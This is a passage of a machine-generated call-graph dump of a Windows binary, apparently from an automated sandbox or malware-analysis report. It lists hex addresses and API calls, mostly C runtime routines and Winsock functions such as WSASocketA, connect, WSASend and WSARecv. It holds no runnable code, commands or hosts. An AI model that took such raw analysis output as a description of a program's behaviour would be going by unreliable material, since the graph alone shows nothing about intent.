18607->18605 18608->18606 18611 2a2d3c2 18609->18611 18612 2a22ef4 _free 59 API calls 18609->18612 18610->18609 18613 2a2d3d4 18611->18613 18615 2a22ef4 _free 59 API calls 18611->18615 18612->18611 18614 2a2d3e6 18613->18614 18616 2a22ef4 _free 59 API calls 18613->18616 18617 2a2d3f8 18614->18617 18618 2a22ef4 _free 59 API calls 18614->18618 18615->18613 18616->18614 18619 2a2d40a 18617->18619 18620 2a22ef4 _free 59 API calls 18617->18620 18618->18617 18621 2a2d41c 18619->18621 18623 2a22ef4 _free 59 API calls 18619->18623 18620->18619 18622 2a2d42e 18621->18622 18624 2a22ef4 _free 59 API calls 18621->18624 18625 2a2d440 18622->18625 18626 2a22ef4 _free 59 API calls 18622->18626 18623->18621 18624->18622 18627 2a22ef4 _free 59 API calls 18625->18627 18625->18628 18626->18625 18627->18628 18628->18584 18630 2a2d461 18629->18630 18640 2a2d4b9 18629->18640 18632 2a2d471 18630->18632 18633 2a22ef4 _free 59 API calls 18630->18633 18631 2a2d483 18635 2a2d495 18631->18635 18636 2a22ef4 _free 59 API calls 18631->18636 18632->18631 18634 2a22ef4 _free 59 API calls 18632->18634 18633->18632 18634->18631 18637 2a2d4a7 18635->18637 18638 2a22ef4 _free 59 API calls 18635->18638 18636->18635 18639 2a22ef4 _free 59 API calls 18637->18639 18637->18640 18638->18637 18639->18640 18640->18600 18642 2a2d4cc 18641->18642 18816 2a25029 18641->18816 18643 2a22ef4 _free 59 API calls 18642->18643 18644 2a2d4d4 18643->18644 18645 2a22ef4 _free 59 API calls 18644->18645 18646 2a2d4dc 18645->18646 18647 2a22ef4 _free 59 API calls 18646->18647 18648 2a2d4e4 18647->18648 18649 2a22ef4 _free 59 API calls 18648->18649 18650 2a2d4ec 18649->18650 18651 2a22ef4 _free 59 API calls 18650->18651 18652 2a2d4f4 18651->18652 18653 2a22ef4 _free 59 API calls 18652->18653 18654 2a2d4fc 18653->18654 18655 2a22ef4 _free 59 API calls 18654->18655 18656 2a2d503 18655->18656 18657 2a22ef4 _free 59 API calls 18656->18657 18658 2a2d50b 18657->18658 18659 2a22ef4 _free 59 API calls 18658->18659 18660 2a2d513 18659->18660 18661 2a22ef4 _free 59 API calls 18660->18661 18816->18581 18817->18570 18821 2a289d7 RtlLeaveCriticalSection 18818->18821 18820 2a25565 18820->18561 18821->18820 18823 2a1df8a __EH_prolog 18822->18823 18824 2a23acc _Allocate 60 API calls 18823->18824 18825 2a1dfa1 18824->18825 18825->18381 18827 2a151cf 18826->18827 18828 2a20ab9 18826->18828 18827->18386 18829 2a23324 __cinit 68 API calls 18828->18829 18829->18827 18831 2a20a90 Mailbox 68 API calls 18830->18831 18832 2a1a6bf 18831->18832 18833 2a1522f 18832->18833 18840 2a12db5 18832->18840 18833->18392 18833->18395 18833->18396 18836 2a20a90 Mailbox 68 API calls 18835->18836 18838 2a1ce73 18836->18838 18837 2a1cf82 18837->18392 18838->18837 18867 2a12b95 18838->18867 18841 2a12de4 18840->18841 18842 2a12dca 18840->18842 18844 2a12dfc 18841->18844 18845 2a12def 18841->18845 18843 2a20a90 Mailbox 68 API calls 18842->18843 18847 2a12dcf 18843->18847 18854 2a12d39 WSASetLastError WSASend 18844->18854 18848 2a20a90 Mailbox 68 API calls 18845->18848 18847->18832 18848->18847 18849 2a12e0c 18849->18847 18850 2a12e54 WSASetLastError select 18849->18850 18852 2a20a90 68 API calls Mailbox 18849->18852 18853 2a12d39 71 API calls 18849->18853 18864 2a1a489 18850->18864 18852->18849 18853->18849 18855 2a1a489 69 API calls 18854->18855 18856 2a12d6e 18855->18856 18857 2a12d75 18856->18857 18859 2a12d82 18856->18859 18858 2a20a90 Mailbox 68 API calls 18857->18858 18861 2a12d7a 18858->18861 18860 2a20a90 Mailbox 68 API calls 18859->18860 18859->18861 18860->18861 18862 2a12d9c 18861->18862 18863 2a20a90 Mailbox 68 API calls 18861->18863 18862->18849 18863->18862 18865 2a20a90 Mailbox 68 API calls 18864->18865 18866 2a1a495 WSAGetLastError 18865->18866 18866->18849 18868 2a12bb1 18867->18868 18869 2a12bc7 18867->18869 18870 2a20a90 Mailbox 68 API calls 18868->18870 18871 2a12bd2 18869->18871 18881 2a12bdf 18869->18881 18875 2a12bb6 18870->18875 18873 2a20a90 Mailbox 68 API calls 18871->18873 18872 2a12be2 WSASetLastError WSARecv 18874 2a1a489 69 API calls 18872->18874 18873->18875 18874->18881 18875->18838 18876 2a20a90 68 API calls Mailbox 18876->18881 18877 2a12d22 18882 2a11996 18877->18882 18879 2a12cbc WSASetLastError select 18880 2a1a489 69 API calls 18879->18880 18880->18881 18881->18872 18881->18875 18881->18876 18881->18877 18881->18879 18883 2a119bb 18882->18883 18884 2a1199f 18882->18884 18883->18875 18885 2a23324 __cinit 68 API calls 18884->18885 18885->18883 18908 2a1e200 18886->18908 18888 2a1d080 18888->18414 18990 2a23339 18889->18990 18892 2a22094 18892->18416 18893 2a220bd ResumeThread 18893->18416 18894 2a220b6 CloseHandle 18894->18893 18896 2a20a90 Mailbox 68 API calls 18895->18896 18897 2a13fb8 18896->18897 19357 2a11815 18897->19357 18900 2a1a60b 18901 2a1a615 __EH_prolog 18900->18901 19363 2a1cbc3 18901->19363 18909 2a1e20a __EH_prolog 18908->18909 18914 2a14030 18909->18914 18913 2a1e238 18913->18888 18926 2a35370 18914->18926 18916 2a1403a GetProcessHeap RtlAllocateHeap 18917 2a14053 std::exception::exception 18916->18917 18918 2a1407c 18916->18918 18927 2a1a64a 18917->18927 18918->18913 18920 2a1408a 18918->18920 18921 2a14094 __EH_prolog 18920->18921 18971 2a1a269 18921->18971 18926->18916 18928 2a1a654 __EH_prolog 18927->18928 18935 2a1cbf9 18928->18935 18933 2a244da __CxxThrowException@8 RaiseException 18934 2a1a682 18933->18934 18941 2a1d759 18935->18941 18938 2a1cc13 18963 2a1d791 18938->18963 18940 2a1a671 18940->18933 18944 2a22493 18941->18944 18947 2a224c1 18944->18947 18948 2a224cf 18947->18948 18952 2a1a663 18947->18952 18953 2a22557 18948->18953 18952->18938 18954 2a22560 18953->18954 18955 2a224d4 18953->18955 18956 2a22ef4 _free 59 API calls 18954->18956 18955->18952 18957 2a22519 18955->18957 18956->18955 18958 2a22525 _strlen 18957->18958 18961 2a2254a 18957->18961 18959 2a22f2c _malloc 59 API calls 18958->18959 18960 2a22537 18959->18960 18960->18961 18962 2a26c3c __setenvp 59 API calls 18960->18962 18961->18952 18962->18961 18964 2a1d79b __EH_prolog 18963->18964 18967 2a1b6bc 18964->18967 18966 2a1d7d2 Mailbox 18966->18940 18968 2a1b6c6 __EH_prolog 18967->18968 18969 2a22493 std::exception::exception 59 API calls 18968->18969 18970 2a1b6d7 Mailbox 18969->18970 18970->18966 18982 2a1b080 18971->18982 18974 2a13fdc 18989 2a35370 18974->18989 18976 2a13fe6 CreateEventA 18977 2a13ffd 18976->18977 18978 2a1400f 18976->18978 18979 2a13fb0 Mailbox 68 API calls 18977->18979 18978->18913 18980 2a14005 18979->18980 18981 2a1a60b Mailbox 60 API calls 18980->18981 18981->18978 18983 2a140c1 18982->18983 18984 2a1b08c 18982->18984 18983->18974 18985 2a23acc _Allocate 60 API calls 18984->18985 18986 2a1b09c std::exception::exception 18984->18986 18985->18986 18986->18983 18987 2a244da __CxxThrowException@8 RaiseException 18986->18987 18988 2a1fab1 18987->18988 18989->18976 18991 2a23347 18990->18991 18992 2a2335b 18990->18992 18993 2a25ddb strtoxl 59 API calls 18991->18993 18994 2a289ec __calloc_crt 59 API calls 18992->18994 18995 2a2334c 18993->18995 18996 2a23368 18994->18996 18997 2a24e75 strtoxl 9 API calls 18995->18997 18998 2a233b9 18996->18998 19000 2a25bda __setmbcp 59 API calls 18996->19000 19003 2a2208b 18997->19003 18999 2a22ef4 _free 59 API calls 18998->18999 19001 2a233bf 18999->19001 19002 2a23375 19000->19002 19001->19003 19009 2a25dba 19001->19009 19004 2a25c61 __initptd 59 API calls 19002->19004 19003->18892 19003->18893 19003->18894 19005 2a2337e CreateThread 19004->19005 19005->19003 19008 2a233b1 GetLastError 19005->19008 19017 2a23499 19005->19017 19008->18998 19014 2a25da7 19009->19014 19011 2a25dc3 __dosmaperr 19012 2a25ddb strtoxl 59 API calls 19011->19012 19013 2a25dd6 19012->19013 19013->19003 19015 2a25bf2 __getptd_noexit 59 API calls 19014->19015 19016 2a25dac 19015->19016 19016->19011 19018 2a234a2 __threadstartex@4 19017->19018 19019 2a2914b __getptd_noexit TlsGetValue 19018->19019 19020 2a234a8 19019->19020 19021 2a234db 19020->19021 19022 2a234af __threadstartex@4 19020->19022 19049 2a25a6f 19021->19049 19025 2a2916a __getptd_noexit TlsSetValue 19022->19025 19024 2a234f6 ___crtIsPackagedApp 19027 2a2350a 19024->19027 19033 2a23441 19024->19033 19026 2a234be 19025->19026 19028 2a234d1 GetCurrentThreadId 19026->19028 19029 2a234c4 GetLastError RtlExitUserThread 19026->19029 19039 2a233d2 19027->19039 19028->19024 19029->19028 19034 2a23483 RtlDecodePointer 19033->19034 19035 2a2344a LoadLibraryExW GetProcAddress 19033->19035 19038 2a23493 19034->19038 19036 2a2346c 19035->19036 19037 2a2346d RtlEncodePointer 19035->19037 19036->19027 19037->19034 19038->19027 19040 2a233de __setmbcp 19039->19040 19041 2a25bda __setmbcp 59 API calls 19040->19041 19042 2a233e3 19041->19042 19081 2a220e0 19042->19081 19052 2a25a7b __setmbcp 19049->19052 19050 2a25b83 __setmbcp 19050->19024 19051 2a25a94 19054 2a25aa3 19051->19054 19055 2a22ef4 _free 59 API calls 19051->19055 19052->19050 19052->19051 19053 2a22ef4 _free 59 API calls 19052->19053 19053->19051 19056 2a25ab2 19054->19056 19057 2a22ef4 _free 59 API calls 19054->19057 19055->19054 19058 2a25ac1 19056->19058 19059 2a22ef4 _free 59 API calls 19056->19059 19057->19056 19060 2a25ad0 19058->19060 19061 2a22ef4 _free 59 API calls 19058->19061 19059->19058 19062 2a25adf 19060->19062 19063 2a22ef4 _free 59 API calls 19060->19063 19061->19060 19064 2a25aee 19062->19064 19065 2a22ef4 _free 59 API calls 19062->19065 19063->19062 19066 2a25b00 19064->19066 19067 2a22ef4 _free 59 API calls 19064->19067 19065->19064 19068 2a2886d __lock 59 API calls 19066->19068 19067->19066 19072 2a25b08 19068->19072 19069 2a25b2b 19349 2a25b8f 19069->19349 19072->19069 19074 2a22ef4 _free 59 API calls 19072->19074 19074->19069 19099 2a21590 19081->19099 19084 2a22130 19085 2a22128 TlsSetValue 19085->19084 19119 2a215f4 19099->19119 19100 2a21670 19101 2a21686 19100->19101 19103 2a21683 CloseHandle 19100->19103 19105 2a244cb __crtLCMapStringA_stat 6 API calls 19101->19105 19102 2a2160c 19104 2a2164e ResetEvent 19102->19104 19108 2a21625 OpenEventA 19102->19108 19137 2a21b90 19102->19137 19103->19101 19106 2a21655 19104->19106 19109 2a2169e 19105->19109 19141 2a217d0 19106->19141 19107 2a2171c WaitForSingleObject 19107->19119 19111 2a21647 19108->19111 19112 2a2163f 19108->19112 19109->19084 19109->19085 19111->19104 19111->19106 19112->19111 19115 2a21644 CloseHandle 19112->19115 19113 2a216f0 CreateEventA 19113->19119 19115->19111 19117 2a21b90 GetCurrentProcessId 19117->19119 19119->19100 19119->19102 19119->19107 19119->19113 19119->19117 19120 2a2170e CloseHandle 19119->19120 19120->19119 19151 2a20bf0 19137->19151 19139 2a21be2 GetCurrentProcessId 19140 2a21bf5 19139->19140 19145 2a217df 19141->19145 19151->19139 19355 2a289d7 RtlLeaveCriticalSection 19349->19355 19351 2a25b38 19355->19351 19360 2a22453 19357->19360 19361 2a22519 std::exception::_Copy_str 59 API calls 19360->19361 19362 2a1182a 19361->19362 19362->18900 19369 2a1d68a 19363->19369 19366 2a1cbdd 19378 2a1d6c2 19366->19378 19372 2a1b1ae 19369->19372 19373 2a1b1b8 __EH_prolog 19372->19373 19374 2a22493 std::exception::exception 59 API calls 19373->19374 19375 2a1b1c9 19374->19375 19376 2a17c7e std::bad_exception::bad_exception 60 API calls 19375->19376 19377 2a1a62a 19376->19377 19377->19366 19379 2a1d6cc __EH_prolog 19378->19379 19382 2a1b5a6 19379->19382 19383 2a1b5b0 __EH_prolog 19382->19383 19407 2a29db1 19386->19407 19388 2a25e8f 19389 2a25eb1 19388->19389 19390 2a25e9a 19388->19390 19392 2a25eb6 19389->19392 19397 2a25ec3 __flsbuf 19389->19397 19391 2a25ddb strtoxl 59 API calls 19390->19391 19394 2a25e9f 19391->19394 19393 2a25ddb strtoxl 59 API calls 19392->19393 19393->19394 19394->18428 19395 2a25fa1 19398 2a29dd5 __write 79 API calls 19395->19398 19396 2a25f27 19399 2a25f41 19396->19399 19400 2a25f58 19396->19400 19397->19394 19403 2a25f12 19397->19403 19406 2a25f1d 19397->19406 19414 2a2f722 19397->19414 19398->19394 19426 2a29dd5 19399->19426 19400->19394 19454 2a2f776 19400->19454 19403->19406 19423 2a2f8e5 19403->19423 19406->19395 19406->19396 19408 2a29dd0 19407->19408 19409 2a29dbb 19407->19409 19408->19388 19410 2a25ddb strtoxl 59 API calls 19409->19410 19411 2a29dc0 19410->19411 19412 2a24e75 strtoxl 9 API calls 19411->19412 19413 2a29dcb 19412->19413 19413->19388 19415 2a2f73a 19414->19415 19416 2a2f72d 19414->19416 19418 2a2f746 19415->19418 19419 2a25ddb strtoxl 59 API calls 19415->19419 19417 2a25ddb strtoxl 59 API calls 19416->19417 19420 2a2f732 19417->19420 19418->19403 19421 2a2f767 19419->19421 19420->19403 19422 2a24e75 strtoxl 9 API calls 19421->19422 19422->19420 19424 2a28a34 __malloc_crt 59 API calls 19423->19424 19425 2a2f8fa 19424->19425 19425->19406 19427 2a29de1 __setmbcp 19426->19427 19428 2a29e05 19427->19428 19429 2a29dee 19427->19429 19430 2a29ea4 19428->19430 19432 2a29e19 19428->19432 19431 2a25da7 __commit 59 API calls 19429->19431 19433 2a25da7 __commit 59 API calls 19430->19433 19434 2a29df3 19431->19434 19435 2a29e41 19432->19435 19436 2a29e37 19432->19436 19440 2a29e3c 19433->19440 19437 2a25ddb strtoxl 59 API calls 19434->19437 19479 2a30c07 19435->19479 19438 2a25da7 __commit 59 API calls 19436->19438 19449 2a29dfa __setmbcp 19437->19449 19438->19440 19442 2a25ddb strtoxl 59 API calls 19440->19442 19441 2a29e47 19443 2a29e5a 19441->19443 19444 2a29e6d 19441->19444 19445 2a29eb0 19442->19445 19488 2a29ec4 19443->19488 19448 2a25ddb strtoxl 59 API calls 19444->19448 19447 2a24e75 strtoxl 9 API calls 19445->19447 19447->19449 19451 2a29e72 19448->19451 19449->19394 19450 2a29e66 19547 2a29e9c 19450->19547 19452 2a25da7 __commit 59 API calls 19451->19452 19452->19450 19455 2a2f782 __setmbcp 19454->19455 19456 2a2f793 19455->19456 19457 2a2f7ab 19455->19457 19458 2a25da7 __commit 59 API calls 19456->19458 19459 2a2f850 19457->19459 19463 2a2f7e0 19457->19463 19460 2a2f798 19458->19460 19461 2a25da7 __commit 59 API calls 19459->19461 19462 2a25ddb strtoxl 59 API calls 19460->19462 19464 2a2f855 19461->19464 19465 2a2f7a0 __setmbcp 19462->19465 19466 2a30c07 ___lock_fhandle 60 API calls 19463->19466 19467 2a25ddb strtoxl 59 API calls 19464->19467 19465->19394 19468 2a2f7e6 19466->19468 19469 2a2f85d 19467->19469 19470 2a2f814 19468->19470 19471 2a2f7fc 19468->19471 19472 2a24e75 strtoxl 9 API calls 19469->19472 19474 2a25ddb strtoxl 59 API calls 19470->19474 19473 2a2f872 __lseeki64_nolock 61 API calls 19471->19473 19472->19465 19475 2a2f80b 19473->19475 19476 2a2f819 19474->19476 19583 2a2f848 19475->19583 19477 2a25da7 __commit 59 API calls 19476->19477 19477->19475 19481 2a30c13 __setmbcp 19479->19481 19480 2a30c62 RtlEnterCriticalSection 19483 2a30c88 __setmbcp 19480->19483 19481->19480 19482 2a2886d __lock 59 API calls 19481->19482 19484 2a30c38 19482->19484 19483->19441 19485 2a30c50 19484->19485 19486 2a2918c ___lock_fhandle InitializeCriticalSectionAndSpinCount 19484->19486 19550 2a30c8c 19485->19550 19486->19485 19489 2a29ed1 __write_nolock 19488->19489 19490 2a29f10 19489->19490 19491 2a29f2f 19489->19491 19519 2a29f05 19489->19519 19493 2a25da7 __commit 59 API calls 19490->19493 19494 2a29f87 19491->19494 19495 2a29f6b 19491->19495 19492 2a244cb __crtLCMapStringA_stat 6 API calls 19496 2a2a725 19492->19496 19497 2a29f15 19493->19497 19499 2a29fa0 19494->19499 19554 2a2f872 19494->19554 19498 2a25da7 __commit 59 API calls 19495->19498 19496->19450 19500 2a25ddb strtoxl 59 API calls 19497->19500 19504 2a29f70 19498->19504 19503 2a2f722 __read_nolock 59 API calls 19499->19503 19502 2a29f1c 19500->19502 19505 2a24e75 strtoxl 9 API calls 19502->19505 19506 2a29fae 19503->19506 19507 2a25ddb strtoxl 59 API calls 19504->19507 19505->19519 19508 2a2a307 19506->19508 19513 2a25bda __setmbcp 59 API calls 19506->19513 19509 2a29f77 19507->19509 19510 2a2a325 19508->19510 19511 2a2a69a WriteFile 19508->19511 19512 2a24e75 strtoxl 9 API calls 19509->19512 19514 2a2a449 19510->19514 19523 2a2a33b 19510->19523 19515 2a2a2fa GetLastError 19511->19515 19521 2a2a2c7 19511->19521 19512->19519 19516 2a29fda GetConsoleMode 19513->19516 19525 2a2a454 19514->19525 19538 2a2a53e 19514->19538 19515->19521 19516->19508 19518 2a2a019 19516->19518 19517 2a2a6d3 19517->19519 19520 2a25ddb strtoxl 59 API calls 19517->19520 19518->19508 19522 2a2a029 GetConsoleCP 19518->19522 19519->19492 19526 2a2a701 19520->19526 19521->19517 19521->19519 19527 2a2a427 19521->19527 19522->19517 19545 2a2a058 19522->19545 19523->19517 19523->19521 19524 2a2a3aa WriteFile 19523->19524 19524->19515 19524->19523 19525->19517 19525->19521 19528 2a2a4b9 WriteFile 19525->19528 19529 2a25da7 __commit 59 API calls 19526->19529 19530 2a2a432 19527->19530 19531 2a2a6ca 19527->19531 19528->19515 19528->19525 19529->19519 19533 2a25ddb strtoxl 59 API calls 19530->19533 19534 2a25dba __dosmaperr 59 API calls 19531->19534 19532 2a2a5b3 WideCharToMultiByte 19532->19515 19532->19538 19536 2a2a437 19533->19536 19534->19519 19535 2a2a602 WriteFile 19535->19538 19539 2a2a655 GetLastError 19535->19539 19540 2a25da7 __commit 59 API calls 19536->19540 19538->19517 19538->19521 19538->19532 19538->19535 19539->19538 19540->19519 19541 2a30fd3 WriteConsoleW CreateFileW __putwch_nolock 19541->19545 19542 2a2ff8a 61 API calls __write_nolock 19542->19545 19543 2a2a141 WideCharToMultiByte 19543->19521 19544 2a2a17c WriteFile 19543->19544 19544->19515 19544->19545 19545->19515 19545->19521 19545->19541 19545->19542 19545->19543 19546 2a2a1d6 WriteFile 19545->19546 19563 2a2dcc8 19545->19563 19546->19515 19546->19545 19582 2a30fad RtlLeaveCriticalSection 19547->19582 19549 2a29ea2 19549->19449 19553 2a289d7 RtlLeaveCriticalSection 19550->19553 19552 2a30c93 19552->19480 19553->19552 19566 2a30ec4 19554->19566 19556 2a2f882 19557 2a2f88a 19556->19557 19558 2a2f89b SetFilePointerEx 19556->19558 19559 2a25ddb strtoxl 59 API calls 19557->19559 19560 2a2f8b3 GetLastError 19558->19560 19562 2a2f88f 19558->19562 19559->19562 19561 2a25dba __dosmaperr 59 API calls 19560->19561 19561->19562 19562->19499 19579 2a2dc8e 19563->19579 19567 2a30ecf 19566->19567 19569 2a30ee4 19566->19569 19568 2a25da7 __commit 59 API calls 19567->19568 19570 2a30ed4 19568->19570 19571 2a25da7 __commit 59 API calls 19569->19571 19573 2a30f09 19569->19573 19572 2a25ddb strtoxl 59 API calls 19570->19572 19574 2a30f13 19571->19574 19575 2a30edc 19572->19575 19573->19556 19576 2a25ddb strtoxl 59 API calls 19574->19576 19575->19556 19577 2a30f1b 19576->19577 19578 2a24e75 strtoxl 9 API calls 19577->19578 19578->19575 19580 2a221fb _LocaleUpdate::_LocaleUpdate 59 API calls 19579->19580 19581 2a2dc9f 19580->19581 19581->19545 19582->19549 19586 2a30fad RtlLeaveCriticalSection 19583->19586 19585 2a2f84e 19585->19465 19586->19585 19587->18432 19589 2a1e2ba __EH_prolog 19588->19589 19590 2a23acc _Allocate 60 API calls 19589->19590 19591 2a1e2c3 19590->19591 19592 2a11bfa RtlEnterCriticalSection 19591->19592 19594 2a1e4d1 19591->19594 19592->18437 19595 2a1e4db __EH_prolog 19594->19595 19598 2a126db RtlEnterCriticalSection 19595->19598 19597 2a1e531 19597->19592 19599 2a12728 CreateWaitableTimerA 19598->19599 19600 2a1277e 19598->19600 19601 2a12738 GetLastError 19599->19601 19602 2a1275b SetWaitableTimer 19599->19602 19603 2a127d5 RtlLeaveCriticalSection 19600->19603 19605 2a23acc _Allocate 60 API calls 19600->19605 19604 2a20a90 Mailbox 68 API calls 19601->19604 19602->19600 19603->19597 19606 2a12745 19604->19606 19607 2a1278a 19605->19607 19642 2a11712 19606->19642 19609 2a127c8 19607->19609 19610 2a23acc _Allocate 60 API calls 19607->19610 19648 2a17d83 19609->19648 19611 2a127a9 19610->19611 19614 2a11cf8 CreateEventA 19611->19614 19615 2a11d23 GetLastError 19614->19615 19616 2a11d52 CreateEventA 19614->19616 19619 2a11d33 19615->19619 19617 2a11d6b GetLastError 19616->19617 19634 2a11d96 19616->19634 19622 2a11d7b 19617->19622 19618 2a23339 __beginthreadex 201 API calls 19620 2a11db6 19618->19620 19621 2a20a90 Mailbox 68 API calls 19619->19621 19623 2a11dc6 GetLastError 19620->19623 19624 2a11e0d 19620->19624 19625 2a11d3c 19621->19625 19626 2a20a90 Mailbox 68 API calls 19622->19626 19631 2a11dd8 19623->19631 19629 2a11e11 WaitForSingleObject FindCloseChangeNotification 19624->19629 19630 2a11e1d 19624->19630 19627 2a11712 60 API calls 19625->19627 19628 2a11d84 19626->19628 19632 2a11d4e 19627->19632 19633 2a11712 60 API calls 19628->19633 19629->19630 19630->19609 19635 2a11ddc CloseHandle 19631->19635 19636 2a11ddf 19631->19636 19632->19616 19633->19634 19634->19618 19635->19636 19637 2a11de9 CloseHandle 19636->19637 19638 2a11dee 19636->19638 19637->19638 19639 2a20a90 Mailbox 68 API calls 19638->19639 19640 2a11dfb 19639->19640 19641 2a11712 60 API calls 19640->19641 19641->19624 19643 2a1171c __EH_prolog 19642->19643 19644 2a1173e 19643->19644 19645 2a11815 Mailbox 59 API calls 19643->19645 19644->19602 19646 2a11732 19645->19646 19651 2a1a422 19646->19651 19649 2a17d9f 19648->19649 19650 2a17d90 CloseHandle 19648->19650 19649->19603 19650->19649 19652 2a1a42c __EH_prolog 19651->19652 19659 2a1c987 19652->19659 19656 2a1a44d 19657 2a244da __CxxThrowException@8 RaiseException 19656->19657 19658 2a1a45b 19657->19658 19660 2a1b1ae std::bad_exception::bad_exception 60 API calls 19659->19660 19661 2a1a43f 19660->19661 19662 2a1c9c3 19661->19662 19663 2a1c9cd __EH_prolog 19662->19663 19666 2a1b15d 19663->19666 19665 2a1c9fc Mailbox 19665->19656 19667 2a1b167 __EH_prolog 19666->19667 19668 2a1b1ae std::bad_exception::bad_exception 60 API calls 19667->19668 19669 2a1b178 Mailbox 19668->19669 19669->19665 19681 2a130ae WSASetLastError 19670->19681 19673 2a130ae 71 API calls 19674 2a13c90 19673->19674 19675 2a116ae 19674->19675 19676 2a116b8 __EH_prolog 19675->19676 19677 2a11701 19676->19677 19678 2a22453 std::exception::exception 59 API calls 19676->19678 19677->18359 19679 2a116dc 19678->19679 19680 2a1a422 60 API calls 19679->19680 19680->19677 19682 2a130ec WSAStringToAddressA 19681->19682 19683 2a130ce 19681->19683 19685 2a1a489 69 API calls 19682->19685 19683->19682 19684 2a130d3 19683->19684 19686 2a20a90 Mailbox 68 API calls 19684->19686 19687 2a13114 19685->19687 19688 2a130d8 19686->19688 19689 2a13154 19687->19689 19690 2a1311e _memcmp 19687->19690 19688->19673 19688->19674 19691 2a13135 19689->19691 19692 2a20a90 Mailbox 68 API calls 19689->19692 19690->19691 19694 2a20a90 Mailbox 68 API calls 19690->19694 19693 2a20a90 Mailbox 68 API calls 19691->19693 19695 2a13193 19691->19695 19692->19691 19693->19695 19694->19691 19695->19688 19696 2a20a90 Mailbox 68 API calls 19695->19696 19696->19688 19698 2a13bdd __EH_prolog 19697->19698 19699 2a13bfe htonl htonl 19698->19699 19709 2a22437 19698->19709 19699->18452 19704 2a13c20 __EH_prolog 19703->19704 19705 2a13c41 19704->19705 19706 2a22437 std::bad_exception::bad_exception 59 API calls 19704->19706 19705->18452 19707 2a13c35 19706->19707 19708 2a1a5d7 60 API calls 19707->19708 19708->19705 19710 2a22453 std::exception::exception 59 API calls 19709->19710 19711 2a13bf2 19710->19711 19712 2a1a5d7 19711->19712 19713 2a1a5e1 __EH_prolog 19712->19713 19720 2a1cafa 19713->19720 19717 2a1a5fc 19718 2a244da __CxxThrowException@8 RaiseException 19717->19718 19719 2a1a60a 19718->19719 19727 2a2241c 19720->19727 19723 2a1cb36 19724 2a1cb40 __EH_prolog 19723->19724 19730 2a1b4cc 19724->19730 19726 2a1cb6f Mailbox 19726->19717 19728 2a22493 std::exception::exception 59 API calls 19727->19728 19729 2a1a5ee 19728->19729 19729->19723 19731 2a1b4d6 __EH_prolog 19730->19731 19732 2a2241c std::bad_exception::bad_exception 59 API calls 19731->19732 19733 2a1b4e7 Mailbox 19732->19733 19733->19726 19755 2a1353e 19734->19755 19738 2a12ae8 WSASetLastError connect 19737->19738 19739 2a12ad8 19737->19739 19740 2a1a489 69 API calls 19738->19740 19741 2a20a90 Mailbox 68 API calls 19739->19741 19742 2a12b07 19740->19742 19743 2a12add 19741->19743 19742->19743 19744 2a20a90 Mailbox 68 API calls 19742->19744 19745 2a20a90 Mailbox 68 API calls 19743->19745 19744->19743 19746 2a12b1b 19745->19746 19748 2a20a90 Mailbox 68 API calls 19746->19748 19750 2a12b38 19746->19750 19748->19750 19754 2a12b87 19750->19754 19815 2a13027 19750->19815 19753 2a20a90 Mailbox 68 API calls 19753->19754 19754->18458 19756 2a13548 __EH_prolog 19755->19756 19757 2a13557 19756->19757 19758 2a13576 19756->19758 19760 2a11996 68 API calls 19757->19760 19777 2a12edd WSASetLastError WSASocketA 19758->19777 19763 2a1355f 19760->19763 19762 2a135ad CreateIoCompletionPort 19764 2a135c5 GetLastError 19762->19764 19765 2a135db 19762->19765 19763->18457 19766 2a20a90 Mailbox 68 API calls 19764->19766 19767 2a20a90 Mailbox 68 API calls 19765->19767 19768 2a135d2 19766->19768 19767->19768 19769 2a13626 19768->19769 19770 2a135ef 19768->19770 19803 2a1de73 19769->19803 19771 2a20a90 Mailbox 68 API calls 19770->19771 19772 2a13608 19771->19772 19785 2a129ee 19772->19785 19775 2a13659 19776 2a20a90 Mailbox 68 API calls 19775->19776 19776->19763 19778 2a20a90 Mailbox 68 API calls 19777->19778 19779 2a12f0a WSAGetLastError 19778->19779 19780 2a12f21 19779->19780 19781 2a12f41 19779->19781 19782 2a12f27 setsockopt 19780->19782 19783 2a12f3c 19780->19783 19781->19762 19781->19763 19782->19783 19784 2a20a90 Mailbox 68 API calls 19783->19784 19784->19781 19786 2a12a0c 19785->19786 19802 2a12aad 19785->19802 19788 2a12a39 WSASetLastError closesocket 19786->19788 19791 2a20a90 Mailbox 68 API calls 19786->19791 19787 2a20a90 Mailbox 68 API calls 19789 2a12ab8 19787->19789 19790 2a1a489 69 API calls 19788->19790 19789->19763 19792 2a12a51 19790->19792 19793 2a12a21 19791->19793 19795 2a20a90 Mailbox 68 API calls 19792->19795 19792->19802 19807 2a12f50 19793->19807 19797 2a12a5c 19795->19797 19798 2a12a7b ioctlsocket WSASetLastError closesocket 19797->19798 19799 2a20a90 Mailbox 68 API calls 19797->19799 19800 2a1a489 69 API calls 19798->19800 19801 2a12a6e 19799->19801 19800->19802 19801->19798 19801->19802 19802->19787 19802->19789 19804 2a1de7d __EH_prolog 19803->19804 19805 2a23acc _Allocate 60 API calls 19804->19805 19806 2a1de91 19805->19806 19806->19775 19808 2a12f70 WSASetLastError setsockopt 19807->19808 19809 2a12f5b 19807->19809 19811 2a1a489 69 API calls 19808->19811 19810 2a20a90 Mailbox 68 API calls 19809->19810 19814 2a12a36 19810->19814 19812 2a12f9e 19811->19812 19813 2a20a90 Mailbox 68 API calls 19812->19813 19812->19814 19813->19814 19814->19788 19816 2a1303b 19815->19816 19817 2a1304d WSASetLastError select 19815->19817 19818 2a20a90 Mailbox 68 API calls 19816->19818 19819 2a1a489 69 API calls 19817->19819 19820 2a12b59 19818->19820 19821 2a13095 19819->19821 19820->19754 19823 2a12fb4 19820->19823 19821->19820 19822 2a20a90 Mailbox 68 API calls 19821->19822 19822->19820 19824 2a12fc0 19823->19824 19825 2a12fd5 WSASetLastError getsockopt 19823->19825 19827 2a20a90 Mailbox 68 API calls 19824->19827 19826 2a1a489 69 API calls 19825->19826 19828 2a1300f 19826->19828 19829 2a12b7a 19827->19829 19828->19829 19830 2a20a90 Mailbox 68 API calls 19828->19830 19829->19753 19829->19754 19830->19829 19838 2a35370 19831->19838 19833 2a132b5 RtlEnterCriticalSection 19834 2a20a90 Mailbox 68 API calls 19833->19834 19835 2a132d6 19834->19835 19839 2a13307 19835->19839 19838->19833 19840 2a13311 __EH_prolog 19839->19840 19842 2a13350 19840->19842 19851 2a17e02 19840->19851 19855 2a1239d 19842->19855 19845 2a13390 19861 2a17dab 19845->19861 19846 2a20a90 Mailbox 68 API calls 19849 2a1337c 19846->19849 19850 2a12d39 71 API calls 19849->19850 19850->19845 19853 2a17e10 19851->19853 19852 2a17e86 19852->19840 